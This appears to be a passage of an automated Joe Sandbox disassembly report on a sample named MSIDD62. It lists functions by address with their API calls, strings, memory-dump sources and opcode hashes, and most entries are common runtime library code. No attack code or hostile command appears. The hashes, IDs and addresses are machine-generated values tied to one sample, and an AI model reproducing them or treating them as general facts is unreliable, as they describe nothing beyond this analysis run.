                                                                      • API String ID: 677527491-0
                                                                      • Opcode ID: 0492060313a700d2d59c75a1dcd133392bb691163c910c0178d000a01ac0df42
                                                                      • Instruction ID: 42768042bbd1dd401b69c08582ad092e93b49b40352d6adec1baed8ba1a18ba1
                                                                      • Opcode Fuzzy Hash: 0492060313a700d2d59c75a1dcd133392bb691163c910c0178d000a01ac0df42
                                                                      • Instruction Fuzzy Hash: 4901B179A01A648BC706FB60D80567D7BA1BFC5740B15401DEA115B382CF786A03CBC9
                                                                      Function 00428C76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00428643,?,00000001,?,?,?,00427788,?,?,00000000), ref: 00428C8D
                                                                      • GetLastError.KERNEL32(?,00428643,?,00000001,?,?,?,00427788,?,?,00000000,?,?,?,00427D0F,?), ref: 00428C99
                                                                        • Part of subcall function 00428C5F: CloseHandle.KERNEL32(FFFFFFFE,00428CA9,?,00428643,?,00000001,?,?,?,00427788,?,?,00000000,?,?), ref: 00428C6F
                                                                      • ___initconout.LIBCMT ref: 00428CA9
                                                                        • Part of subcall function 00428C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00428C50,00428630,?,?,00427788,?,?,00000000,?), ref: 00428C34
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00428643,?,00000001,?,?,?,00427788,?,?,00000000,?), ref: 00428CBE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: 42325f89df925bd9c1fa98412f56af35fd26dbfacb7c35fe74cc164c57004cef
                                                                      • Instruction ID: 8ae8611faa65d1ee9f418b7d0ffd7e3067f00d75883292946002dc4ab6281d02
                                                                      • Opcode Fuzzy Hash: 42325f89df925bd9c1fa98412f56af35fd26dbfacb7c35fe74cc164c57004cef
                                                                      • Instruction Fuzzy Hash: CAF01236602165BBCF262F92EC0499E3F66FF097A1F504429FA1995231DF31C921DB98
                                                                      Function 004078FD Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SleepConditionVariableCS.KERNELBASE(?,0040789A,00000064), ref: 00407920
                                                                      • LeaveCriticalSection.KERNEL32(00444AF8,?,?,0040789A,00000064,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 0040792A
                                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,0040789A,00000064,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 0040793B
                                                                      • EnterCriticalSection.KERNEL32(00444AF8,?,0040789A,00000064,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 00407942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                      • String ID:
                                                                      • API String ID: 3269011525-0
                                                                      • Opcode ID: a33dc497978db0a78e6668e7237b82fc2ccf7c26be946b430ca494877b22873a
                                                                      • Instruction ID: 68747c4110e8fa7e3f072300d8b2b7eac0083cc636511242de60eccdd6146cc2
                                                                      • Opcode Fuzzy Hash: a33dc497978db0a78e6668e7237b82fc2ccf7c26be946b430ca494877b22873a
                                                                      • Instruction Fuzzy Hash: 42E09235F85624EBD7212B50EC09F9D3F14EB45755B514032F50572170CBB458028BEE
                                                                      Function 00421DAF Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p0D$p0D
                                                                      • API String ID: 0-224073010
                                                                      • Opcode ID: 299178b718dded120cbb0d0875b8f06ea10c203b902fda0b5cc29cb2c74ed3ef
                                                                      • Instruction ID: ce5aa8f753f6b5d4a41e67969faef2ef6b9a0dfc326b809da7fb2d0661fa303d
                                                                      • Opcode Fuzzy Hash: 299178b718dded120cbb0d0875b8f06ea10c203b902fda0b5cc29cb2c74ed3ef
                                                                      • Instruction Fuzzy Hash: D2C146B1E40214BBDB20DBA8DD42FEFB7F8AF08704F540166FE05EB282E67499459794
                                                                      Function 0041709D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0041712D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: ff11a3993ad0dc6aa6f893144390e9602d43c5f40452708f15561dc029e124c8
                                                                      • Instruction ID: eb9da57fd858225a18aeac309c344f66c00cc1d1a9ae97665f0daa8edc256873
                                                                      • Opcode Fuzzy Hash: ff11a3993ad0dc6aa6f893144390e9602d43c5f40452708f15561dc029e124c8
                                                                      • Instruction Fuzzy Hash: 10516EB1A1C206A6CB157724DA413EB7BB09B41740F208D7BF4D5423A5EB3C8CDB9A4E
                                                                      Function 00406C34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                      • API String ID: 3732870572-1956417402
                                                                      • Opcode ID: 705d3debf1a5dddd72039d855a1dd46f71d8830a331db34451873cc4cbbbbbdd
                                                                      • Instruction ID: 759285b87f5f25321c4f1997ad331d3ca6cfb8e0767ee5f51ca79aaa6ddf3071
                                                                      • Opcode Fuzzy Hash: 705d3debf1a5dddd72039d855a1dd46f71d8830a331db34451873cc4cbbbbbdd
                                                                      • Instruction Fuzzy Hash: 5B51C270B082599ADB259F6988507BFBBB6AF45310F16407FE4C2B7381C27C89528B58
                                                                      Function 003EF860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003EFA3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID: false$true
                                                                      • API String ID: 118556049-2658103896
                                                                      • Opcode ID: 8fb9e53b79602db719e933bfc5e54682f4f82e8969bb99f9f8c24cfc82215226
                                                                      • Instruction ID: f4ddfaaad996ecdee2a3089c61a5490319e2ff1c672a5fb38075ef6db3ce7d22
                                                                      • Opcode Fuzzy Hash: 8fb9e53b79602db719e933bfc5e54682f4f82e8969bb99f9f8c24cfc82215226
                                                                      • Instruction Fuzzy Hash: 8C5109B1D00358DFDB11DFA4C841BEEB7B8FF09304F14822AE845AB282E774A945CB91
                                                                      Function 004022AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 004022B1
                                                                      • _swprintf.LIBCMT ref: 00402329
                                                                        • Part of subcall function 003F780A: __EH_prolog3.LIBCMT ref: 003F7811
                                                                        • Part of subcall function 003F780A: std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003F780A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 2348759532-1402515088
                                                                      • Opcode ID: 8456d65d31e660a99e60c7db0ecb886cabd7ddc1a7bcff9336b8e8d4d8030744
                                                                      • Instruction ID: 947038cec30a964f0908d055f1a4cbcf24af065b7fa75c835fcb44342fdce0a1
                                                                      • Opcode Fuzzy Hash: 8456d65d31e660a99e60c7db0ecb886cabd7ddc1a7bcff9336b8e8d4d8030744
                                                                      • Instruction Fuzzy Hash: 7C517C71D00219ABCF05DFE4D948ADDBBB9FF08300F20456AE506AB2A5DB789905CF54
                                                                      Function 0040258E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00402595
                                                                      • _swprintf.LIBCMT ref: 0040260D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: 1db3f7eae31a433768aa36faa9ac36169132749b83e21ca4e83a98c23bf9ba58
                                                                      • Instruction ID: 3692285579ad709abba0ac2bf5b9aa475cd3754b43ed4767a272b3c570d024b4
                                                                      • Opcode Fuzzy Hash: 1db3f7eae31a433768aa36faa9ac36169132749b83e21ca4e83a98c23bf9ba58
                                                                      • Instruction Fuzzy Hash: 6F517C71D00258ABCF06DFE4D948ADEBBB9FF08300F20456AE542AB2D1DB789905CF94
                                                                      Function 00406607 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 0040660E
                                                                      • _swprintf.LIBCMT ref: 00406686
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: c1e2ab7ad512c549851f5196737ed30cfbf4074dd2cfc5c09a4796afa6fa0566
                                                                      • Instruction ID: 126a9db83fb89e894c57876ebceca1d0e2d456081288aab13bf483debac0ba01
                                                                      • Opcode Fuzzy Hash: c1e2ab7ad512c549851f5196737ed30cfbf4074dd2cfc5c09a4796afa6fa0566
                                                                      • Instruction Fuzzy Hash: FA516971D00258ABCF0ADFE4D884ADDBBB5FB48300F20496AE506AB2A5DB399915CF54
                                                                      Function 003E9620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 0-3019864461
                                                                      • Opcode ID: 3410fb7e5c02815c6b9d471fdb891575549d34ca5373fb8090a12a58c70c33b0
                                                                      • Instruction ID: c303163d6aef5aff252cc87940dc909ae52af570e469979e4c879068935f6435
                                                                      • Opcode Fuzzy Hash: 3410fb7e5c02815c6b9d471fdb891575549d34ca5373fb8090a12a58c70c33b0
                                                                      • Instruction Fuzzy Hash: 6851B170A103549BDB25CF66C885BAEB7B5FF98314F10461FE801B72C1DBB5A988CB94
                                                                      Function 003E3D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 003E3DA3
                                                                      • CertGetNameStringW.CRYPT32(000000FF,00000004,00000000,00000000,00000010,000000FF), ref: 003E3E3F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CertNameString
                                                                      • String ID: x->
                                                                      • API String ID: 149855834-1156097982
                                                                      • Opcode ID: 602a3d4b63ed5ed9df2eeb6001223afef9dd465bd92d89cc1f09a06fe7dd77b8
                                                                      • Instruction ID: 5ff08edff01ca0a0c66585508f7bb9715e8645227ae03257903b8a50a4399d76
                                                                      • Opcode Fuzzy Hash: 602a3d4b63ed5ed9df2eeb6001223afef9dd465bd92d89cc1f09a06fe7dd77b8
                                                                      • Instruction Fuzzy Hash: 5E41CD71A00656AFD715CF69CC05BAAFBB4FF84314F20432AE915E73D0E7B1AA408B94
                                                                      Function 0040B5D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 0040B5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 2118026453-2084237596
                                                                      • Opcode ID: 465421d766cc6bd8e83d9380d6e757eedfee4f80a3e5f489f8e9020ced571981
                                                                      • Instruction ID: 7224985a4688261aadbb58a2464900904f747aef9d0e6cbcd85683d5bc8b0415
                                                                      • Opcode Fuzzy Hash: 465421d766cc6bd8e83d9380d6e757eedfee4f80a3e5f489f8e9020ced571981
                                                                      • Instruction Fuzzy Hash: 55419C71900209AFCF15CF98CD81AEEBBB5FF48304F18846AF904772A1D33A9950DB99
                                                                      Function 0040217C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00402183
                                                                        • Part of subcall function 003F780A: __EH_prolog3.LIBCMT ref: 003F7811
                                                                        • Part of subcall function 003F780A: std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003F780A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                      • String ID: %.0Lf$0123456789-
                                                                      • API String ID: 2728201062-3094241602
                                                                      • Opcode ID: 833bf8b7d6fada808221c545aeab9ec71adb9633ccf9e83b11d61e4cdaa06672
                                                                      • Instruction ID: 71c1ff8caee5dfb2d588a9cf2ddbd2f5e8fbf360dae938069775ca6fdb8d445d
                                                                      • Opcode Fuzzy Hash: 833bf8b7d6fada808221c545aeab9ec71adb9633ccf9e83b11d61e4cdaa06672
                                                                      • Instruction Fuzzy Hash: 0F414931A00218DFCF06EFD4DA859EEBBB5BF09310F10016EE911BB2A1DB749956CB59
                                                                      Function 00402460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00402467
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: ee5f5b564c11a4ecd03d838e02d641d9e53ef7edf6e18e8dab23b445b996c6d6
                                                                      • Instruction ID: 13119eb9805afc73811e23f7f20f561ad1d42578541938222ab4eb2a32eae7c1
                                                                      • Opcode Fuzzy Hash: ee5f5b564c11a4ecd03d838e02d641d9e53ef7edf6e18e8dab23b445b996c6d6
                                                                      • Instruction Fuzzy Hash: 5A418E31900268DFCF06DF98DA859EEBBB5FF09310F10016AF905BB291DB749955CB68
                                                                      Function 004064DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 004064E2
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: 8d26a3cf5e1c4af72b948d41b563e7ef4a13136e840ad8967e5df9098b238ab3
                                                                      • Instruction ID: e557e5e0285226c9d1aac740fd593463a49a7ed812537391b0890f486b15f650
                                                                      • Opcode Fuzzy Hash: 8d26a3cf5e1c4af72b948d41b563e7ef4a13136e840ad8967e5df9098b238ab3
                                                                      • Instruction Fuzzy Hash: 86415E31900219EFCF06DFA5E9819DE7BB5EF09310F10446EF412BB291DB399A16CB59
                                                                      Function 004067B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: f9bd6110b4bfdc9b5ee6fb246937858efea6bd65962bb48b8850d3556bde3a9b
                                                                      • Instruction ID: 33f3391d9c9cd7ae376f9d37d11402412f7a8483cd7f17db3b5b784248e700eb
